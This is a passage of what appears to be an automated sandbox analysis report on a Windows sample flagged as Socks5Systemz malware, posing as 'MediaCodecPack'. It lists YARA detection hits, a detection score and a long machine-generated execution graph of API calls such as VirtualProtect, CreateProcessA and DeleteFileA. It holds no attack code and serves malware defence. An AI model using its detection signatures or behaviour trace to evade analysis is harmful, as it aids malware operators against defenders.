• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: false

Execution Graph

Execution Coverage: 21.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.4%
Total number of Nodes: 1520
Total number of Limit Nodes: 22
5527 409ba2 5523->5527 5529 409768 5524->5529 5525 409c0d VirtualQuery 5525->5524 5525->5527 5526 409bcc VirtualProtect 5526->5527 5527->5524 5527->5525 5527->5526 5528 409bfb VirtualProtect 5527->5528 5528->5525 5709 406bd0 GetCommandLineA 5529->5709 5531 409850 5533 4031b8 4 API calls 5531->5533 5532 406c2c 20 API calls 5536 409785 5532->5536 5534 40986a 5533->5534 5534->5469 5601 409c88 5534->5601 5535 403454 18 API calls 5535->5536 5536->5531 5536->5532 5536->5535 5538 406c53 GetModuleFileNameA 5537->5538 5539 406c77 GetCommandLineA 5537->5539 5540 403278 18 API calls 5538->5540 5547 406c7c 5539->5547 5541 406c75 5540->5541 5545 406ca4 5541->5545 5542 406c81 5543 403198 4 API calls 5542->5543 5546 406c89 5543->5546 5544 406af0 18 API calls 5544->5547 5548 403198 4 API calls 5545->5548 5549 40322c 4 API calls 5546->5549 5547->5542 5547->5544 5547->5546 5550 406cb9 5548->5550 5549->5545 5550->5470 5552 4074ea 5551->5552 5716 407576 5552->5716 5719 407578 5552->5719 5553 407516 5554 40752a 5553->5554 5555 40748c 35 API calls 5553->5555 5558 409c34 FindResourceA 5554->5558 5555->5554 5559 409c49 5558->5559 5560 409c4e SizeofResource 5558->5560 5561 409ae8 18 API calls 5559->5561 5562 409c60 LoadResource 5560->5562 5563 409c5b 5560->5563 5561->5560 5565 409c73 LockResource 5562->5565 5566 409c6e 5562->5566 5564 409ae8 18 API calls 5563->5564 5564->5562 5568 409c84 5565->5568 5569 409c7f 5565->5569 5567 409ae8 18 API calls 5566->5567 5567->5565 5568->5477 5568->5480 5570 409ae8 18 API calls 5569->5570 5570->5568 5572 4074b4 5571->5572 5573 4074c4 5572->5573 5574 4073ec 34 API calls 5572->5574 5573->5482 5574->5573 5576 407a35 5575->5576 5577 405890 18 API calls 5576->5577 5578 407a89 5576->5578 5577->5578 5579 407918 InterlockedExchange 5578->5579 5580 407a9b 5579->5580 5581 405890 18 API calls 5580->5581 5582 407ab1 5580->5582 5581->5582 5583 405890 18 API calls 5582->5583 5584 407af4 5582->5584 5583->5584 5584->5485 5590 408b82 5585->5590 5597 408b39 5585->5597 
5586 408bcd 5722 407cb8 5586->5722 5587 407cb8 35 API calls 5587->5597 5589 408be4 5593 4031b8 4 API calls 5589->5593 5590->5586 5592 4034f0 18 API calls 5590->5592 5598 4031e8 18 API calls 5590->5598 5599 403420 18 API calls 5590->5599 5600 407cb8 35 API calls 5590->5600 5591 4034f0 18 API calls 5591->5597 5592->5590 5596 408bfe 5593->5596 5594 403420 18 API calls 5594->5597 5595 4031e8 18 API calls 5595->5597 5615 404c20 5596->5615 5597->5587 5597->5590 5597->5591 5597->5594 5597->5595 5598->5590 5599->5590 5600->5590 5602 40322c 4 API calls 5601->5602 5603 409cab 5602->5603 5604 409cba MessageBoxA 5603->5604 5605 409ccf 5604->5605 5606 403198 4 API calls 5605->5606 5607 409cd7 5606->5607 5607->5469 5609 409af1 5608->5609 5610 409b09 5608->5610 5611 405890 18 API calls 5609->5611 5612 405890 18 API calls 5610->5612 5613 409b03 5611->5613 5614 409b1a 5612->5614 5613->5478 5614->5478 5744 402594 5615->5744 5617 404c2b 5617->5489 5618->5494 5620 405940 19 API calls 5619->5620 5621 405cb9 5620->5621 5622 405280 GetSystemDefaultLCID 5621->5622 5626 4052b6 5622->5626 5623 40520c 19 API calls 5623->5626 5624 4031e8 18 API calls 5624->5626 5625 404cdc 19 API calls 5625->5626 5626->5623 5626->5624 5626->5625 5627 405318 5626->5627 5628 4031e8 18 API calls 5627->5628 5629 404cdc 19 API calls 5627->5629 5630 40520c 19 API calls 5627->5630 5631 40539b 5627->5631 5628->5627 5629->5627 5630->5627 5632 4031b8 4 API calls 5631->5632 5633 4053b5 5632->5633 5634 4053c4 GetSystemDefaultLCID 5633->5634 5691 40520c GetLocaleInfoA 5634->5691 5637 4031e8 18 API calls 5638 405404 5637->5638 5639 40520c 19 API calls 5638->5639 5640 405419 5639->5640 5641 40520c 19 API calls 5640->5641 5642 40543d 5641->5642 5697 405258 GetLocaleInfoA 5642->5697 5645 405258 GetLocaleInfoA 5646 40546d 5645->5646 5647 40520c 19 API calls 5646->5647 5648 405487 5647->5648 5649 405258 GetLocaleInfoA 5648->5649 5650 4054a4 5649->5650 5651 40520c 19 API calls 5650->5651 5652 4054be 5651->5652 5653 4031e8 18 API 
calls 5652->5653 5654 4054cb 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054e0 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 4054ed 5657->5658 5659 405258 GetLocaleInfoA 5658->5659 5660 4054fb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 405515 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 405522 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405537 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405544 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405559 5669->5670 5671 405576 5670->5671 5672 405567 5670->5672 5674 40322c 4 API calls 5671->5674 5699 40322c 5672->5699 5675 405574 5674->5675 5676 40520c 19 API calls 5675->5676 5677 405598 5676->5677 5678 4055b5 5677->5678 5679 4055a6 5677->5679 5680 403198 4 API calls 5678->5680 5681 40322c 4 API calls 5679->5681 5682 4055b3 5680->5682 5681->5682 5683 4033b4 18 API calls 5682->5683 5684 4055d7 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055f1 5685->5686 5687 4031b8 4 API calls 5686->5687 5688 40560b 5687->5688 5689 405cf4 GetVersionExA 5688->5689 5690 405d0b 5689->5690 5690->5459 5692 405233 5691->5692 5693 405245 5691->5693 5694 403278 18 API calls 5692->5694 5695 40322c 4 API calls 5693->5695 5696 405243 5694->5696 5695->5696 5696->5637 5698 405274 5697->5698 5698->5645 5701 403230 5699->5701 5700 403252 5700->5675 5701->5700 5702 4025ac 4 API calls 5701->5702 5702->5700 5707 403414 5703->5707 5706 406fee 5706->5519 5708 403418 LoadLibraryA 5707->5708 5708->5706 5710 406af0 18 API calls 5709->5710 5711 406bf3 5710->5711 5712 406c05 5711->5712 5713 406af0 18 API calls 5711->5713 5714 403198 4 API calls 5712->5714 5713->5711 5715 406c1a 5714->5715 5715->5536 5717 407578 5716->5717 5718 4075b7 CreateFileA 5717->5718 5718->5553 5720 403414 5719->5720 5721 4075b7 CreateFileA 5720->5721 5721->5553 5723 407cd3 5722->5723 5725 407cc8 5722->5725 5728 407c5c 5723->5728 5725->5589 5727 405890 18 API calls 5727->5725 5729 407c70 5728->5729 5730 407caf 5728->5730 5729->5730 
5732 407bac 5729->5732 5730->5725 5730->5727 5733 407bb7 5732->5733 5734 407bc8 5732->5734 5736 405890 18 API calls 5733->5736 5735 4074a0 34 API calls 5734->5735 5737 407bdc 5735->5737 5736->5734 5738 4074a0 34 API calls 5737->5738 5739 407bfd 5738->5739 5740 407918 InterlockedExchange 5739->5740 5741 407c12 5740->5741 5742 407c28 5741->5742 5743 405890 18 API calls 5741->5743 5742->5729 5743->5742 5745 402598 5744->5745 5747 4025a2 5744->5747 5750 401fd4 5745->5750 5746 40259e 5746->5747 5748 403154 4 API calls 5746->5748 5747->5617 5747->5747 5748->5747 5751 401fe8 5750->5751 5752 401fed 5750->5752 5761 401918 RtlInitializeCriticalSection 5751->5761 5754 402012 RtlEnterCriticalSection 5752->5754 5755 40201c 5752->5755 5760 401ff1 5752->5760 5754->5755 5755->5760 5768 401ee0 5755->5768 5758 402147 5758->5746 5759 40213d RtlLeaveCriticalSection 5759->5758 5760->5746 5762 40193c RtlEnterCriticalSection 5761->5762 5763 401946 5761->5763 5762->5763 5764 401964 LocalAlloc 5763->5764 5765 40197e 5764->5765 5766 4019c3 RtlLeaveCriticalSection 5765->5766 5767 4019cd 5765->5767 5766->5767 5767->5752 5771 401ef0 5768->5771 5769 401f1c 5773 401f40 5769->5773 5779 401d00 5769->5779 5771->5769 5771->5773 5774 401e58 5771->5774 5773->5758 5773->5759 5783 4016d8 5774->5783 5777 401e75 5777->5771 5780 401d4e 5779->5780 5781 401d1e 5779->5781 5780->5781 5852 401c68 5780->5852 5781->5773 5786 4016f4 5783->5786 5785 4016fe 5808 4015c4 5785->5808 5786->5785 5788 40175b 5786->5788 5790 40174f 5786->5790 5800 401430 5786->5800 5812 40132c 5786->5812 5788->5777 5793 401dcc 5788->5793 5816 40150c 5790->5816 5791 40170a 5791->5788 5826 401d80 5793->5826 5796 40132c LocalAlloc 5797 401df0 5796->5797 5799 401df8 5797->5799 5830 401b44 5797->5830 5799->5777 5801 40143f VirtualAlloc 5800->5801 5803 40146c 5801->5803 5804 40148f 5801->5804 5820 4012e4 5803->5820 5804->5786 5807 40147c VirtualFree 5807->5804 5810 40160a 5808->5810 5809 40163a 5809->5791 5810->5809 5811 401626 VirtualAlloc 
5810->5811 5811->5809 5811->5810 5813 401348 5812->5813 5814 4012e4 LocalAlloc 5813->5814 5815 40138f 5814->5815 5815->5786 5819 40153b 5816->5819 5817 401594 5817->5788 5818 401568 VirtualFree 5818->5819 5819->5817 5819->5818 5823 40128c 5820->5823 5824 401298 LocalAlloc 5823->5824 5825 4012aa 5823->5825 5824->5825 5825->5804 5825->5807 5827 401d89 5826->5827 5829 401d92 5826->5829 5827->5829 5835 401b74 5827->5835 5829->5796 5831 401b61 5830->5831 5832 401b52 5830->5832 5831->5799 5833 401d00 9 API calls 5832->5833 5834 401b5f 5833->5834 5834->5799 5838 40215c 5835->5838 5837 401b95 5837->5829 5839 40217a 5838->5839 5840 402175 5838->5840 5842 4021ab RtlEnterCriticalSection 5839->5842 5843 40217e 5839->5843 5850 4021b5 5839->5850 5841 401918 4 API calls 5840->5841 5841->5839 5842->5850 5843->5837 5844 4021c1 5846 4022e3 RtlLeaveCriticalSection 5844->5846 5847 4022ed 5844->5847 5845 402244 5845->5843 5848 401d80 7 API calls 5845->5848 5846->5847 5847->5837 5848->5843 5849 402270 5849->5844 5851 401d00 7 API calls 5849->5851 5850->5844 5850->5845 5850->5849 5851->5844 5853 401c7a 5852->5853 5854 401c9d 5853->5854 5855 401caf 5853->5855 5865 40188c 5854->5865 5857 40188c 3 API calls 5855->5857 5858 401cad 5857->5858 5859 401b44 9 API calls 5858->5859 5864 401cc5 5858->5864 5860 401cd4 5859->5860 5861 401cee 5860->5861 5875 401b98 5860->5875 5880 4013a0 5861->5880 5864->5781 5866 4018b2 5865->5866 5874 40190b 5865->5874 5884 401658 5866->5884 5869 40132c LocalAlloc 5870 4018cf 5869->5870 5871 40150c VirtualFree 5870->5871 5872 4018e6 5870->5872 5871->5872 5873 4013a0 LocalAlloc 5872->5873 5872->5874 5873->5874 5874->5858 5876 401bab 5875->5876 5877 401b9d 5875->5877 5876->5861 5878 401b74 9 API calls 5877->5878 5879 401baa 5878->5879 5879->5861 5881 4013ab 5880->5881 5882 4013c6 5881->5882 5883 4012e4 LocalAlloc 5881->5883 5882->5864 5883->5882 5886 40168f 5884->5886 5885 4016cf 5885->5869 5886->5885 5887 4016a9 VirtualFree 5886->5887 5887->5886 6844 402dfa 6845 
402e26 6844->6845 6846 402e0d 6844->6846 6848 402ba4 6846->6848 6849 402bc9 6848->6849 6850 402bad 6848->6850 6849->6845 6851 402bb5 RaiseException 6850->6851 6851->6849 6852 4075fa GetFileSize 6853 407626 6852->6853 6854 407616 GetLastError 6852->6854 6854->6853 6855 40761f 6854->6855 6856 40748c 35 API calls 6855->6856 6856->6853 6857 406ffb 6858 407008 SetErrorMode 6857->6858 6526 403a80 CloseHandle 6527 403a90 6526->6527 6528 403a91 GetLastError 6526->6528 6529 404283 6530 4042c3 6529->6530 6531 403154 4 API calls 6530->6531 6532 404323 6531->6532 6859 404185 6860 4041ff 6859->6860 6861 4041cc 6860->6861 6862 403154 4 API calls 6860->6862 6863 404323 6862->6863 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6540 403e67 6534->6540 6542 403cc8 6535->6542 6538 402674 4 API calls 6536->6538 6539 403e78 6538->6539 6540->6539 6546 402674 6540->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6540 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6539 6557 407e90 6558 407eb8 VirtualFree 6557->6558 6559 407e9d 6558->6559 6562 403e95 6563 403e4c 6562->6563 6564 403e62 6563->6564 6565 403e7b 6563->6565 6569 403e67 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6569 6568 403e78 6567->6568 6569->6568 6570 402674 4 API calls 6569->6570 6570->6568 6571 40ac97 6580 4096fc 6571->6580 6574 402f24 5 API calls 6575 40aca1 6574->6575 6576 403198 4 API calls 6575->6576 6577 40acc0 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc8 6578->6579 6589 4056ac 6580->6589 6582 409717 6583 409745 6582->6583 6595 40720c 6582->6595 6585 403198 4 API calls 6583->6585 6587 40975a 6585->6587 6586 409735 6588 40973d MessageBoxA 6586->6588 6587->6574 6587->6575 6588->6583 6590 403154 4 API calls 6589->6590 6591 4056b1 6590->6591 6592 4056c9 6591->6592 6593 403154 4 API calls 6591->6593 6592->6582 6594 4056bf 6593->6594 6594->6582 6596 4056ac 4 API 
calls 6595->6596 6597 40721b 6596->6597 6598 407221 6597->6598 6599 40722f 6597->6599 6600 40322c 4 API calls 6598->6600 6602 40724b 6599->6602 6603 40723f 6599->6603 6601 40722d 6600->6601 6601->6586 6613 4032b8 6602->6613 6606 4071d0 6603->6606 6607 40322c 4 API calls 6606->6607 6608 4071df 6607->6608 6609 4071fc 6608->6609 6610 406950 CharPrevA 6608->6610 6609->6601 6611 4071eb 6610->6611 6611->6609 6612 4032fc 18 API calls 6611->6612 6612->6609 6614 403278 18 API calls 6613->6614 6615 4032c2 6614->6615 6615->6601 6616 403a97 6617 403aac 6616->6617 6618 403ab2 6617->6618 6619 403bbc GetStdHandle 6617->6619 6620 403b0e CreateFileA 6617->6620 6621 403c17 GetLastError 6619->6621 6633 403bba 6619->6633 6620->6621 6622 403b2c 6620->6622 6621->6618 6624 403b3b GetFileSize 6622->6624 6622->6633 6624->6621 6626 403b4e SetFilePointer 6624->6626 6625 403be7 GetFileType 6625->6618 6628 403c02 CloseHandle 6625->6628 6626->6621 6629 403b6a ReadFile 6626->6629 6628->6618 6629->6621 6630 403b8c 6629->6630 6631 403b9f SetFilePointer 6630->6631 6630->6633 6631->6621 6632 403bb0 SetEndOfFile 6631->6632 6632->6621 6632->6633 6633->6618 6633->6625 6638 40aaa2 6639 40aad2 6638->6639 6640 40aadc CreateWindowExA SetWindowLongA 6639->6640 6641 405194 33 API calls 6640->6641 6642 40ab5f 6641->6642 6643 4032fc 18 API calls 6642->6643 6644 40ab6d 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab7a 6645->6646 6647 406b7c 19 API calls 6646->6647 6648 40ab86 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab8f 6649->6650 6651 4099ec 43 API calls 6650->6651 6652 40aba1 6651->6652 6653 4098cc 19 API calls 6652->6653 6654 40abb4 6652->6654 6653->6654 6655 40abed 6654->6655 6656 4094d8 9 API calls 6654->6656 6657 40ac06 6655->6657 6660 40ac00 RemoveDirectoryA 6655->6660 6656->6655 6658 40ac1a 6657->6658 6659 40ac0f DestroyWindow 6657->6659 6661 40ac42 6658->6661 6662 40357c 4 API calls 6658->6662 6659->6658 6660->6657 6663 40ac38 6662->6663 6664 4025ac 4 API calls 6663->6664 
6664->6661 6876 405ba2 6878 405ba4 6876->6878 6877 405be0 6881 405940 19 API calls 6877->6881 6878->6877 6879 405bf7 6878->6879 6880 405bda 6878->6880 6885 404cdc 19 API calls 6879->6885 6880->6877 6882 405c4c 6880->6882 6883 405bf3 6881->6883 6884 4059b0 33 API calls 6882->6884 6886 403198 4 API calls 6883->6886 6884->6883 6887 405c20 6885->6887 6889 405c86 6886->6889 6888 4059b0 33 API calls 6887->6888 6888->6883 6890 408da4 6891 408dc8 6890->6891 6892 408c80 18 API calls 6891->6892 6893 408dd1 6892->6893 6665 402caa 6666 403154 4 API calls 6665->6666 6667 402caf 6666->6667 6908 4011aa 6909 4011ac GetStdHandle 6908->6909 6668 4028ac 6669 402594 18 API calls 6668->6669 6670 4028b6 6669->6670 4980 40aab4 4981 40aab8 SetLastError 4980->4981 5012 409648 GetLastError 4981->5012 4984 40aad2 4986 40aadc CreateWindowExA SetWindowLongA 4984->4986 5025 405194 4986->5025 4990 40ab6d 4991 4032fc 18 API calls 4990->4991 4992 40ab7a 4991->4992 5042 406b7c GetCommandLineA 4992->5042 4995 4032fc 18 API calls 4996 40ab8f 4995->4996 5047 4099ec 4996->5047 4998 40aba1 5000 40abb4 4998->5000 5068 4098cc 4998->5068 5001 40abd4 5000->5001 5002 40abed 5000->5002 5074 4094d8 5001->5074 5004 40ac06 5002->5004 5007 40ac00 RemoveDirectoryA 5002->5007 5005 40ac1a 5004->5005 5006 40ac0f DestroyWindow 5004->5006 5008 40ac42 5005->5008 5082 40357c 5005->5082 5006->5005 5007->5004 5010 40ac38 5095 4025ac 5010->5095 5099 404c94 5012->5099 5020 4096c3 5114 4031b8 5020->5114 5026 4051a8 33 API calls 5025->5026 5027 4051a3 5026->5027 5028 4032fc 5027->5028 5029 403300 5028->5029 5030 40333f 5028->5030 5031 4031e8 5029->5031 5032 40330a 5029->5032 5030->4990 5038 403254 18 API calls 5031->5038 5039 4031fc 5031->5039 5033 403334 5032->5033 5034 40331d 5032->5034 5035 4034f0 18 API calls 5033->5035 5275 4034f0 5034->5275 5041 403322 5035->5041 5036 403228 5036->4990 5038->5039 5039->5036 5040 4025ac 4 API calls 5039->5040 5040->5036 5041->4990 5301 406af0 5042->5301 5044 406ba1 5045 403198 4 API calls 
5044->5045 5046 406bbf 5045->5046 5046->4995 5315 4033b4 5047->5315 5049 409a27 5050 409a59 CreateProcessA 5049->5050 5051 409a65 5050->5051 5052 409a6c CloseHandle 5050->5052 5053 409648 35 API calls 5051->5053 5054 409a75 5052->5054 5053->5052 5055 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5054->5055 5056 409a7a MsgWaitForMultipleObjects 5055->5056 5056->5054 5057 409a91 5056->5057 5058 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5057->5058 5059 409a96 GetExitCodeProcess CloseHandle 5058->5059 5060 409ab6 5059->5060 5061 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5060->5061 5062 409abe 5061->5062 5062->4998 5063 402f24 5064 403154 4 API calls 5063->5064 5065 402f29 5064->5065 5321 402bcc 5065->5321 5067 402f51 5067->5067 5069 40990e 5068->5069 5070 4098d4 5068->5070 5069->5000 5070->5069 5071 403420 18 API calls 5070->5071 5072 409908 5071->5072 5324 408e80 5072->5324 5075 409532 5074->5075 5079 4094eb 5074->5079 5075->5002 5076 4094f3 Sleep 5076->5079 5077 409503 Sleep 5077->5079 5079->5075 5079->5076 5079->5077 5080 40951a GetLastError 5079->5080 5347 408fbc 5079->5347 5080->5075 5081 409524 GetLastError 5080->5081 5081->5075 5081->5079 5085 403591 5082->5085 5091 4035a0 5082->5091 5083 4035b1 5086 403198 4 API calls 5083->5086 5084 4035b8 5087 4031b8 4 API calls 5084->5087 5088 4035d0 5085->5088 5089 40359b 5085->5089 5090 4035b6 5085->5090 5086->5090 5087->5090 5088->5090 5093 40357c 4 API calls 5088->5093 5089->5091 5092 4035ec 5089->5092 5090->5010 5091->5083 5091->5084 5092->5090 5364 403554 5092->5364 5093->5088 5096 4025b0 5095->5096 5097 4025ba 5095->5097 5096->5097 5098 403154 4 API calls 5096->5098 5097->5008 5097->5097 5098->5097 5122 4051a8 5099->5122 5102 407284 FormatMessageA 5103 4072aa 5102->5103 5104 403278 18 API calls 5103->5104 5105 4072c7 5104->5105 5106 408da8 5105->5106 5107 408dc8 5106->5107 5265 408c80 5107->5265 5110 405890 5111 405897 5110->5111 5112 4031e8 18 API calls 5111->5112 5113 4058af 
5112->5113 5113->5020 5116 4031be 5114->5116 5115 4031e3 5118 403198 5115->5118 5116->5115 5117 4025ac 4 API calls 5116->5117 5117->5116 5119 4031b7 5118->5119 5120 40319e 5118->5120 5119->4984 5119->5063 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5119 5123 4051c5 5122->5123 5130 404e58 5123->5130 5126 4051f1 5135 403278 5126->5135 5133 404e73 5130->5133 5131 404e85 5131->5126 5140 404be4 5131->5140 5133->5131 5143 404f7a 5133->5143 5150 404e4c 5133->5150 5136 403254 18 API calls 5135->5136 5137 403288 5136->5137 5138 403198 4 API calls 5137->5138 5139 4032a0 5138->5139 5139->5102 5257 405940 5140->5257 5142 404bf5 5142->5126 5144 404f8b 5143->5144 5148 404fd9 5143->5148 5147 40505f 5144->5147 5144->5148 5146 404ff7 5146->5133 5147->5146 5157 404e38 5147->5157 5148->5146 5153 404df4 5148->5153 5151 403198 4 API calls 5150->5151 5152 404e56 5151->5152 5152->5133 5154 404e02 5153->5154 5160 404bfc 5154->5160 5156 404e30 5156->5148 5187 4039a4 5157->5187 5163 4059b0 5160->5163 5162 404c15 5162->5156 5164 4059be 5163->5164 5173 404cdc LoadStringA 5164->5173 5167 405194 33 API calls 5168 4059f6 5167->5168 5176 4031e8 5168->5176 5171 4031b8 4 API calls 5172 405a1b 5171->5172 5172->5162 5174 403278 18 API calls 5173->5174 5175 404d09 5174->5175 5175->5167 5177 4031ec 5176->5177 5180 4031fc 5176->5180 5177->5180 5182 403254 5177->5182 5178 403228 5178->5171 5180->5178 5181 4025ac 4 API calls 5180->5181 5181->5178 5183 403274 5182->5183 5184 403258 5182->5184 5183->5180 5185 402594 18 API calls 5184->5185 5186 403261 5185->5186 5186->5180 5188 4039ab 5187->5188 5193 4038b4 5188->5193 5190 4039cb 5191 403198 4 API calls 5190->5191 5192 4039d2 5191->5192 5192->5146 5194 4038d5 5193->5194 5195 4038c8 5193->5195 5197 403934 5194->5197 5198 4038db 5194->5198 5221 403780 5195->5221 5199 403993 5197->5199 5200 40393b 5197->5200 5201 4038e1 5198->5201 5202 4038ee 5198->5202 5203 4037f4 3 API calls 5199->5203 5204 403941 5200->5204 5205 40394b 5200->5205 5228 403894 
5201->5228 5207 403894 6 API calls 5202->5207 5210 4038d0 5203->5210 5243 403864 5204->5243 5209 4037f4 3 API calls 5205->5209 5211 4038fc 5207->5211 5212 40395d 5209->5212 5210->5190 5233 4037f4 5211->5233 5215 403864 23 API calls 5212->5215 5214 403917 5239 40374c 5214->5239 5216 403976 5215->5216 5219 40374c VariantClear 5216->5219 5218 40392c 5218->5190 5220 40398b 5219->5220 5220->5190 5222 4037f0 5221->5222 5224 403744 5221->5224 5222->5210 5223 403793 VariantClear 5223->5224 5224->5221 5224->5223 5225 4037ab 5224->5225 5226 403198 4 API calls 5224->5226 5227 4037dc VariantCopyInd 5224->5227 5225->5210 5226->5224 5227->5222 5227->5224 5248 4036b8 5228->5248 5231 40374c VariantClear 5232 4038a9 5231->5232 5232->5210 5234 403845 VariantChangeTypeEx 5233->5234 5235 40380a VariantChangeTypeEx 5233->5235 5238 403832 5234->5238 5236 403826 5235->5236 5237 40374c VariantClear 5236->5237 5237->5238 5238->5214 5240 403759 5239->5240 5241 403766 5239->5241 5240->5241 5242 403779 VariantClear 5240->5242 5241->5218 5242->5218 5254 40369c SysStringLen 5243->5254 5246 40374c VariantClear 5247 403882 5246->5247 5247->5210 5249 4036cb 5248->5249 5250 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5249->5250 5251 4036db 5249->5251 5252 40372e 5250->5252 5253 4036ed MultiByteToWideChar SysAllocStringLen 5251->5253 5252->5231 5253->5252 5255 403610 21 API calls 5254->5255 5256 4036b3 5255->5256 5256->5246 5258 40594c 5257->5258 5259 404cdc 19 API calls 5258->5259 5260 405972 5259->5260 5261 4031e8 18 API calls 5260->5261 5262 40597d 5261->5262 5263 403198 4 API calls 5262->5263 5264 405992 5263->5264 5264->5142 5266 403198 4 API calls 5265->5266 5268 408cb1 5265->5268 5266->5268 5267 4031b8 4 API calls 5269 408d69 5267->5269 5270 408cc8 5268->5270 5271 403278 18 API calls 5268->5271 5273 408cdc 5268->5273 5274 4032fc 18 API calls 5268->5274 5269->5110 5272 4032fc 18 API calls 5270->5272 5271->5268 5272->5273 5273->5267 5274->5268 5276 4034fd 5275->5276 5283 
40352d 5275->5283 5278 403526 5276->5278 5281 403509 5276->5281 5277 403198 4 API calls 5280 403517 5277->5280 5279 403254 18 API calls 5278->5279 5279->5283 5280->5041 5284 4025c4 5281->5284 5283->5277 5286 4025ca 5284->5286 5285 4025dc 5285->5280 5285->5285 5286->5285 5288 403154 5286->5288 5289 403164 5288->5289 5290 40318c TlsGetValue 5288->5290 5289->5285 5291 403196 5290->5291 5292 40316f 5290->5292 5291->5285 5296 40310c 5292->5296 5294 403174 TlsGetValue 5295 403184 5294->5295 5295->5285 5297 403120 LocalAlloc 5296->5297 5298 403116 5296->5298 5299 40313e TlsSetValue 5297->5299 5300 403132 5297->5300 5298->5297 5299->5300 5300->5294 5302 406b1c 5301->5302 5303 403278 18 API calls 5302->5303 5304 406b29 5303->5304 5311 403420 5304->5311 5306 406b31 5307 4031e8 18 API calls 5306->5307 5308 406b49 5307->5308 5309 403198 4 API calls 5308->5309 5310 406b6b 5309->5310 5310->5044 5312 403426 5311->5312 5314 403437 5311->5314 5313 403254 18 API calls 5312->5313 5312->5314 5313->5314 5314->5306 5316 4033bc 5315->5316 5317 403254 18 API calls 5316->5317 5318 4033cf 5317->5318 5319 4031e8 18 API calls 5318->5319 5320 4033f7 5319->5320 5322 402bd5 RaiseException 5321->5322 5323 402be6 5321->5323 5322->5323 5323->5067 5325 408e8e 5324->5325 5327 408ea6 5325->5327 5337 408e18 5325->5337 5328 408e18 18 API calls 5327->5328 5329 408eca 5327->5329 5328->5329 5340 407918 5329->5340 5331 408ee5 5332 408e18 18 API calls 5331->5332 5334 408ef8 5331->5334 5332->5334 5333 408e18 18 API calls 5333->5334 5334->5333 5335 403278 18 API calls 5334->5335 5336 408f27 5334->5336 5335->5334 5336->5069 5338 405890 18 API calls 5337->5338 5339 408e29 5338->5339 5339->5327 5343 4078c4 5340->5343 5344 4078d6 5343->5344 5345 4078e7 5343->5345 5346 4078db InterlockedExchange 5344->5346 5345->5331 5346->5345 5355 408f70 5347->5355 5349 408fd2 5350 408fd6 5349->5350 5351 408ff2 DeleteFileA GetLastError 5349->5351 5350->5079 5352 409010 5351->5352 5361 408fac 5352->5361 5356 408f7a 5355->5356 5357 
408f7e 5355->5357 5356->5349 5358 408fa0 SetLastError 5357->5358 5359 408f87 Wow64DisableWow64FsRedirection 5357->5359 5360 408f9b 5358->5360 5359->5360 5360->5349 5362 408fb1 Wow64RevertWow64FsRedirection 5361->5362 5363 408fbb 5361->5363 5362->5363 5363->5079 5365 403566 5364->5365 5367 403578 5365->5367 5368 403604 5365->5368 5367->5092 5369 40357c 5368->5369 5374 40359b 5369->5374 5375 4035d0 5369->5375 5376 4035a0 5369->5376 5380 4035b6 5369->5380 5370 4035b1 5372 403198 4 API calls 5370->5372 5371 4035b8 5373 4031b8 4 API calls 5371->5373 5372->5380 5373->5380 5374->5376 5377 4035ec 5374->5377 5378 40357c 4 API calls 5375->5378 5375->5380 5376->5370 5376->5371 5379 403554 4 API calls 5377->5379 5377->5380 5378->5375 5379->5377 5380->5365 6671 401ab9 6672 401a96 6671->6672 6673 401aa9 RtlDeleteCriticalSection 6672->6673 6674 401a9f RtlLeaveCriticalSection 6672->6674 6674->6673

APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B8A
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
